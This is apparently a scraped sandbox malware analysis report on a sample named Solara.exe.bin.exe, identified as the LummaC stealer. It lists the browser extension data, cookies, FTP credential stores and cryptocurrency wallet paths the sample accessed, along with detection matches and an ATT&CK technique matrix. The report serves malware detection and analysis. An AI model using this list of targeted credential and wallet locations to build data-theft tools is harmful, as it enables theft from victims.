Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT	Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT	Jump to behavior

Source: Yara match	File source: 00000002.00000003.974422341.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.974203654.00000000011DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Solara.exe.bin.exe PID: 5928, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: 2.2.Solara.exe.bin.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Solara.exe.bin.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2169158568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.962652813.0000000002E7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	141 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Command and Scripting Interpreter	1 Windows Service	1 Windows Service	11 Deobfuscate/Decode Files or Information	LSASS Memory	11 File and Directory Discovery	Remote Desktop Protocol	41 Data from Local System	13 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	211 Process Injection	4 Obfuscated Files or Information	Security Account Manager	54 System Information Discovery	SMB/Windows Admin Shares	1 Screen Capture	21 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 PowerShell	Login Hook	1 Scheduled Task/Job	2 Software Packing	NTDS	381 Security Software Discovery	Distributed Component Object Model	3 Clipboard Data	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	1 Process Discovery	SSH	Keylogging	125 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	271 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	271 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	211 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Solara.exe.bin.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Bitcoin Miner

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
Solara.exe.bin.exe